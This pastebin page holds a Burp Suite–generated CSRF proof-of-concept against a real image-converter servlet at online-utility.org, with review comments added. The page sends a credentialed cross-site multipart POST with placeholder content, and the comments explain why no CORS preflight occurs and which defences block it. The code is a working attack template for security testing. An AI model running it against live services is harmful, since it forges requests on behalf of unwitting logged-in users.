
Untitled

a guest
Sep 14th, 2018
  1. <html>
  2.   <!-- CSRF PoC - generated by Burp Suite Professional -->
       <!--
         Review notes: this page sends one cross-site POST, with credentials requested,
         to the ImageConverter servlet when the button at the bottom is clicked.
         Whether the servlet acts on it depends on server-side checks that are not
         visible here. The controls that stop this class of request are a per-session
         anti-CSRF token validated by the servlet, validation of the Origin / Referer
         header, and a SameSite attribute on the session cookie.
       -->
  3.   <body>
       <!-- Pushes a history entry for "/" so the address bar shows "/" instead of this file's own path. -->
  4.   <script>history.pushState('', '', '/')</script>
  5.     <script>
            // submitRequest: builds a multipart/form-data POST by hand and sends it with
            // XMLHttpRequest. Takes no arguments and returns nothing; the response is never read.
  6.       function submitRequest()
  7.       {
  8.         var xhr = new XMLHttpRequest();
              // Asynchronous POST to a fixed third-party URL ("\/" is just an escaped "/").
  9.         xhr.open("POST", "https:\/\/www.online-utility.org\/servlet\/ImageConverter", true);
              // NOTE(review): Accept, Accept-Language and a multipart/form-data Content-Type are
              // all CORS-safelisted, so the browser is expected to send this POST without a
              // preflight OPTIONS request. CORS alone therefore does not stop the request from
              // reaching the servlet; it only limits whether this page may read the response.
  10.         xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
  11.         xhr.setRequestHeader("Accept-Language", "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3");
  12.         xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------206860758214748693911873600863");
              // Asks the browser to attach the user's cookies for the target origin. SameSite and
              // third-party-cookie restrictions decide whether they are actually sent.
  13.         xhr.withCredentials = true;
              // Hand-built multipart body with two parts: a file field "fname" carrying the
              // placeholder content "BLABLA", and a second field "totot". Each delimiter is the
              // boundary declared in Content-Type prefixed with "--"; the last one also ends in "--".
  14.         var body = "-----------------------------206860758214748693911873600863\r\n" +
  15.           "Content-Disposition: form-data; name=\"fname\"; filename=\"Logo_sstic_transp.png\"\r\n" +
  16.           "Content-Type: image/png\r\n" +
  17.           "\r\n" +
  18.           "BLABLA\r\n" +
  19.           "-----------------------------206860758214748693911873600863\r\n" +
  20.           "Content-Disposition: form-data; name=\"totot\"\r\n" +
  21.           "Content-Type: image/png\r\n" +
  22.           "\r\n" +
  23.           "titit\r\n" +
  24.           "-----------------------------206860758214748693911873600863--\r\n";
              // Copies each UTF-16 code unit of the string into a byte array. Values above 255
              // would be truncated, which does not matter for this ASCII-only body.
  25.         var aBody = new Uint8Array(body.length);
  26.         for (var i = 0; i < aBody.length; i++)
  27.          aBody[i] = body.charCodeAt(i);
              // Sends the bytes as an untyped Blob. A cross-origin request like this carries an
              // Origin header naming the site that hosts this page, which the servlet can compare
              // against its own origin and which is visible in request logs.
  28.        xhr.send(new Blob([aBody]));
  29.      }
  30.    </script>
          <!-- The request is sent only when the button is clicked; action="#" keeps the form itself from submitting anywhere. -->
  31.     <form action="#">
  32.       <input type="button" value="Submit request" onclick="submitRequest();" />
  33.     </form>
  34.   </body>
  35. </html>